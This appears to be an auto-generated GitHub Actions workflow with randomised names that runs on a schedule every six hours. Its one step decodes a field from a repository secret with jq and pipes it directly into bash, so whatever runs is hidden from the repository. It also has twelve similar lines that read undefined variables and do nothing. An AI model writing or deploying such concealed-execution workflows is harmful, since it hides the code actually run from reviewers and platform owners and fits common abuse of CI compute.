name: yanruhuo7654
on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanruhuo7654
        env:
          va7: ${{ secrets.va7 }}
        run: |
          echo $va7 | jq -r .adci7660 | /bin/bash
          echo $iafls171 | jq -r .l820 | /bin/bash
          echo $gavpb836 | jq -r .wsb64862 | /bin/bash
          echo $caep815 | jq -r .aqn9156 | /bin/bash
          echo $n29 | jq -r .w07 | /bin/bash
          echo $m06 | jq -r .a48 | /bin/bash
          echo $uuhs7331 | jq -r .oqm0 | /bin/bash
          echo $vpv63 | jq -r .nfx623 | /bin/bash
          echo $tbol695 | jq -r .phu918 | /bin/bash
          echo $sea74264 | jq -r .vqr064 | /bin/bash
          echo $wk61862 | jq -r .bkpvs79 | /bin/bash
          echo $uh65 | jq -r .wv1 | /bin/bash
          echo $mnuk49 | jq -r .wr4 | /bin/bash

